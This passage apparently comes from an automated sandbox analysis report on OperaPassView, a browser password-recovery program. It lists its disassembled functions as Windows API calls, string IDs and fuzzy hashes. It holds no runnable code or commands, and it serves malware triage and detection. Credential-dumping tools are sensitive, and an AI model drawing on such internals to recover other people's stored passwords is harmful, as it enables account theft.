                                        • Opcode Fuzzy Hash: 261b58cf0eec15e2e1794024efc3ddad4b6e1d3671ff6baf08edaa83f7d118c1
                                        • Instruction Fuzzy Hash: 5301A033901D209BC2267B6A940141FB364FEC4710305853FE9097B3C28B3CAC519EED
                                        APIs
                                        • GetParent.USER32(?), ref: 00404CFE
                                        • GetWindowRect.USER32(?,?), ref: 00404D0B
                                        • GetClientRect.USER32(00000000,?), ref: 00404D16
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00404D26
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00404D42
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 0d690f730de1b6905f7339d1d32c430505b30dd23a6c25870a45e20dd623eb1d
                                        • Instruction ID: cf7d221995cc0ae4e4d56e5caa9f908b12f985c4a8ff532fce3c53658c4e8bd7
                                        • Opcode Fuzzy Hash: 0d690f730de1b6905f7339d1d32c430505b30dd23a6c25870a45e20dd623eb1d
                                        • Instruction Fuzzy Hash: AE018C72800029BBDB11ABA58D89EFF7FBCEF46750F044129FA01B2040D73895018BA4
                                        APIs
                                          • Part of subcall function 00403960: CreateFileW.KERNEL32(00000003,80000000,00000003,00000000,00000003,00000000,00000000,00403B2F,?), ref: 00403972
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00401FCC,?,00681010), ref: 0040B63B
                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,?,00401FCC,?,00681010), ref: 0040B650
                                        • memset.MSVCRT ref: 0040B65E
                                          • Part of subcall function 0040427E: ReadFile.KERNEL32(?,?,?,00000000,00000000), ref: 00404295
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B67E
                                          • Part of subcall function 0040B400: memchr.MSVCRT ref: 0040B43F
                                          • Part of subcall function 0040B400: memcpy.MSVCRT(?,0040C790,0000000B), ref: 0040B4E7
                                          • Part of subcall function 0040B400: memcpy.MSVCRT(?,00000001,00000008), ref: 0040B4F7
                                        • CloseHandle.KERNEL32(00000000,?,?,00401FCC,?,00681010), ref: 0040B686
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                        • String ID:
                                        • API String ID: 2594257661-0
                                        • Opcode ID: 7d084e8c0d917e166d8fc0be95caedd0ef5482d6fb046a78ff3cde73c0d70851
                                        • Instruction ID: 75b962c83f5597cb288aa85692f01b56f0d7078cfcce17b4e6b1c939becd18f7
                                        • Opcode Fuzzy Hash: 7d084e8c0d917e166d8fc0be95caedd0ef5482d6fb046a78ff3cde73c0d70851
                                        • Instruction Fuzzy Hash: 91F06272100214BAC22037769C89E9B3A9CDFC17A4F114A3EF556722D2DB399800D2FD
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057AE
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057BC
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057CD
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057E4
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057ED
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: cea9b1777f4fe2077fb01e06492c58dcf486c784f00d0aeebc101b9834385b95
                                        • Instruction ID: 24d33b00e2a7b7b339b6c452371fdc3f9e556b67c2a79a450af54949837e1705
                                        • Opcode Fuzzy Hash: cea9b1777f4fe2077fb01e06492c58dcf486c784f00d0aeebc101b9834385b95
                                        • Instruction Fuzzy Hash: 85F0EC72504B019BD720AF6D95C491BB7E9EB84314B608C3FF049E7682CB38A8406A6C
                                        APIs
                                        • BeginDeferWindowPos.USER32(00000004), ref: 00403283
                                          • Part of subcall function 004015C8: GetDlgItem.USER32(?,?), ref: 004015D8
                                          • Part of subcall function 004015C8: GetClientRect.USER32(?,?), ref: 004015EA
                                          • Part of subcall function 004015C8: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401654
                                        • EndDeferWindowPos.USER32(00000000), ref: 004032D1
                                        • InvalidateRect.USER32(?,?,00000001), ref: 004032DC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                        • String ID: $
                                        • API String ID: 2498372239-3993045852
                                        • Opcode ID: b4925a47ad5c7c82fa4981d9c831245e3cb2ba26048be89d340e067e16b23bd8
                                        • Instruction ID: ce0dde1c5ccb21ff072573540a66a360195cb02966cd540c61d16c9cc8d8a673
                                        • Opcode Fuzzy Hash: b4925a47ad5c7c82fa4981d9c831245e3cb2ba26048be89d340e067e16b23bd8
                                        • Instruction Fuzzy Hash: FB11B670280208FFEB215F15CCC5F6F7EACDB51B99F10413AF5057A1E1C6B49E0186A8
                                        APIs
                                        • memset.MSVCRT ref: 00406CBB
                                        • memset.MSVCRT ref: 00406CD2
                                          • Part of subcall function 00406327: wcscpy.MSVCRT ref: 0040632C
                                          • Part of subcall function 00406327: _wcslwr.MSVCRT ref: 0040635F
                                        • _snwprintf.MSVCRT ref: 00406D01
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: </%s>
                                        • API String ID: 168708657-259020660
                                        • Opcode ID: a8fdc77576d2d317f1ea72d24cc77227ef8f34cd971395aefd8ac601f1947882
                                        • Instruction ID: 6a416a60d3308e8752733bddb3c0541536534b39e796b9571d08b2a886c5dd3b
                                        • Opcode Fuzzy Hash: a8fdc77576d2d317f1ea72d24cc77227ef8f34cd971395aefd8ac601f1947882
                                        • Instruction Fuzzy Hash: 8F0186F2D401296BD720AB55CC45FEA766CEF45318F0004B6BB08B7082D7789A458BD9
                                        APIs
                                        • memset.MSVCRT ref: 00404FC5
                                        • GetPrivateProfileStringW.KERNEL32(00410D78,?,0040C3F0,?,00001000,00410B68), ref: 00404FED
                                        • WritePrivateProfileStringW.KERNEL32(00410D78,?,?,00410B68), ref: 0040500F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString$Writememset
                                        • String ID: xA
                                        • API String ID: 747731527-299298737
                                        • Opcode ID: 3fab942bb674a0dd551379886f7cd08537350ec84625e90ae14467a426e746b7
                                        • Instruction ID: b3f257a075a3dd523be960fda3401aaaa782971525adb0e2f35dd5816bada188
                                        • Opcode Fuzzy Hash: 3fab942bb674a0dd551379886f7cd08537350ec84625e90ae14467a426e746b7
                                        • Instruction Fuzzy Hash: 45F0AF31940318FAEB205B51DC4DFCB3768EB84718F004172BB08B11C2D7B89A80CAAD
                                        APIs
                                          • Part of subcall function 00403D15: memset.MSVCRT ref: 00403D1F
                                          • Part of subcall function 00403D15: wcscpy.MSVCRT ref: 00403D5F
                                        • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040107C
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 0040109A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        • Opcode ID: c084c5277869a5d151a46929ddb1d12913e68e5f073360a59db045cc3f1f3578
                                        • Instruction ID: 79044cec659ce028f5ed2952e81c049cea9264cb083b404993247dfa8a44912f
                                        • Opcode Fuzzy Hash: c084c5277869a5d151a46929ddb1d12913e68e5f073360a59db045cc3f1f3578
                                        • Instruction Fuzzy Hash: 5EF0E270A40304B7E6216BA0DC86F8A7BBDAB40B00F104139B741BA0E0D6F46192CA58
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ClassName_wcsicmpmemset
                                        • String ID: edit
                                        • API String ID: 2747424523-2167791130
                                        • Opcode ID: e777c84daaff5312312b745305a767abe020e08bc75556860ee29f48c933b5b3
                                        • Instruction ID: 96ca970e5ce760780859b3d1d5f0b7c20d996f0d6dc3506b7cd15fc6093d8675
                                        • Opcode Fuzzy Hash: e777c84daaff5312312b745305a767abe020e08bc75556860ee29f48c933b5b3
                                        • Instruction Fuzzy Hash: 63E0D8B2D9030DAAFB10EBA0DC8AFA537ACEB00704F0001B6F515F10C2EB74A6494A88
                                        APIs
                                        • LoadLibraryW.KERNEL32(shell32.dll,0040AAEF,?), ref: 0040AABF
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AAD4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2574300362-880857682
                                        • Opcode ID: 593d17e9276b56e7568bc76f33da6cac7503a89dddf6390720df0987fcdb757b
                                        • Instruction ID: a9c077829c63e3427da9d6ea6305b1b6c562c19f7a7418d7c59ad09ea6bb4f60
                                        • Opcode Fuzzy Hash: 593d17e9276b56e7568bc76f33da6cac7503a89dddf6390720df0987fcdb757b
                                        • Instruction Fuzzy Hash: E2D0C774610304EFD7009F669D497567994A708715F109437E756F12F8D7784810DF1D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: 3b72156044261ea129f8cd4c3b105914ef94e7cbe1efc6e781f6e5ba62a6bea3
                                        • Instruction ID: 21c00b5734eb3d567cf088a0365e344c4847e95ec70e366810ec0c01c0267a0d
                                        • Opcode Fuzzy Hash: 3b72156044261ea129f8cd4c3b105914ef94e7cbe1efc6e781f6e5ba62a6bea3
                                        • Instruction Fuzzy Hash: 9001FCB1A50B046BD235AA35CC03F1A73A4EF91724F000B2EF15276AC2D7BCA50891DD
                                        APIs
                                          • Part of subcall function 00405BD5: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405BF7
                                          • Part of subcall function 00405BD5: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C8C
                                        • wcslen.MSVCRT ref: 004074D8
                                        • _wtoi.MSVCRT(?), ref: 004074E4
                                        • _wcsicmp.MSVCRT ref: 00407532
                                        • _wcsicmp.MSVCRT ref: 00407543
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                        • String ID:
                                        • API String ID: 1549203181-0
                                        • Opcode ID: 6828c864208fbb81d1753add5a6d0da93504c5913cdcde66002761eda46f4ff5
                                        • Instruction ID: cf844fb8323e12a02f27c7c02474ad0a1c2ebbee51d9f020252b4c614b42a62b
                                        • Opcode Fuzzy Hash: 6828c864208fbb81d1753add5a6d0da93504c5913cdcde66002761eda46f4ff5
                                        • Instruction Fuzzy Hash: 68416D31904605BFCB20DF69C984A9EBBF0FB48319F10847EE955E37A1E738B9508B45
                                        APIs
                                        • free.MSVCRT ref: 004062CA
                                        • memcpy.MSVCRT(00000000,?,?,g"@,?,?,?,?,?,00402267), ref: 004062DC
                                        • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,00402267), ref: 0040630F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy$free
                                        • String ID: g"@
                                        • API String ID: 2888793982-1672938247
                                        • Opcode ID: d0368e864a8ee8171a8213670f6b6c2321b61b6c5172591d21014e3f04fea0c9
                                        • Instruction ID: 847f1e285f704c4283300a2ceb5e062fed8206f8320e772a557491d1eabc8965
                                        • Opcode Fuzzy Hash: d0368e864a8ee8171a8213670f6b6c2321b61b6c5172591d21014e3f04fea0c9
                                        • Instruction Fuzzy Hash: CF21A130900604EFCB20EF69CA4181ABBF5FF843147204A7EE856E7791E735EE119B58
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemcpymemsetwcscmp
                                        • String ID:
                                        • API String ID: 2457885024-0
                                        • Opcode ID: 29b7007dc27532f12ac5d86aa4f19c13ccb3944361463df0eaac2def0b3d2e6a
                                        • Instruction ID: 9e2dca859bd8e337fc0f0d7f4250584473b8221a81ad69390a77a03363fec707
                                        • Opcode Fuzzy Hash: 29b7007dc27532f12ac5d86aa4f19c13ccb3944361463df0eaac2def0b3d2e6a
                                        • Instruction Fuzzy Hash: 0F11AB73448345AAD720DB91D445ACB73DCEB94314F10C93FF548E21C1EB78D25A8B9A
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040138B,?,?,?,?,0040E9E0,0000000C), ref: 00404824
                                        • memset.MSVCRT ref: 00404835
                                        • memcpy.MSVCRT(00410280,?,00000000,00000000,00000000,00000000,00000000,?,?,0040138B,?,?,?,?,0040E9E0,0000000C), ref: 00404841
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040484E
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: e25d2549f6dab1a7562d81ffe65a948629634f0979137ff2180887f085573f83
                                        • Instruction ID: 7f3cbbeba0b97abfd5b2ef5626cf5e3f75e87b7b74b1eee1a654a7845a9fc56c
                                        • Opcode Fuzzy Hash: e25d2549f6dab1a7562d81ffe65a948629634f0979137ff2180887f085573f83
                                        • Instruction Fuzzy Hash: DC116DB62146019FD328DF2DC881A26F7E5EFD8300B20CD2EE59A97381D735E801CB64
                                        APIs
                                        • memset.MSVCRT ref: 0040A432
                                          • Part of subcall function 004042BC: _snwprintf.MSVCRT ref: 00404301
                                          • Part of subcall function 004042BC: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404311
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A45B
                                        • memset.MSVCRT ref: 0040A465
                                        • GetPrivateProfileStringW.KERNEL32(?,?,0040C3F0,?,00002000,?), ref: 0040A487
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: 22f5d59bff97f869856556b5e760ba140d4e58d9a9b7cfbb3677f7c58657b990
                                        • Instruction ID: 94bb197b7141ad7f05964ad995fa54540d22cb66ee77c7832990cf404167c01c
                                        • Opcode Fuzzy Hash: 22f5d59bff97f869856556b5e760ba140d4e58d9a9b7cfbb3677f7c58657b990
                                        • Instruction Fuzzy Hash: 1711CEB2900119AFDF115F60EC06E9E7BB8EF04710F10017AFF04B20A0E6319A60DBAD
                                        APIs
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                          • Part of subcall function 004049DF: LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                          • Part of subcall function 004049DF: memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                        • _snwprintf.MSVCRT ref: 00407796
                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 004077FB
                                          • Part of subcall function 004049DF: wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 004049DF: wcslen.MSVCRT ref: 00404A7E
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                        • _snwprintf.MSVCRT ref: 004077C1
                                        • wcscat.MSVCRT ref: 004077D4
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                        • String ID:
                                        • API String ID: 822687973-0
                                        • Opcode ID: 0552a4ee1fe7cae6563512a282f531b3918f3ba0caa6d02f987acbc20cf991f4
                                        • Instruction ID: 597e801b89bc4fa3654148d7d39f706251bc5a95df630e696ebe74f71ef7d3bb
                                        • Opcode Fuzzy Hash: 0552a4ee1fe7cae6563512a282f531b3918f3ba0caa6d02f987acbc20cf991f4
                                        • Instruction Fuzzy Hash: C6014DB15007046AE720F775CD8AF6B73ACDB40704F04047BB719F61C2D639A9554AAD
                                        APIs
                                        • memset.MSVCRT ref: 00401E56
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00401E73
                                        • strlen.MSVCRT ref: 00401E85
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00401E96
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: adc9852e0b1febc2202ee91c46c3e0fdf9a531db0be14c9f292d03bd11a29de5
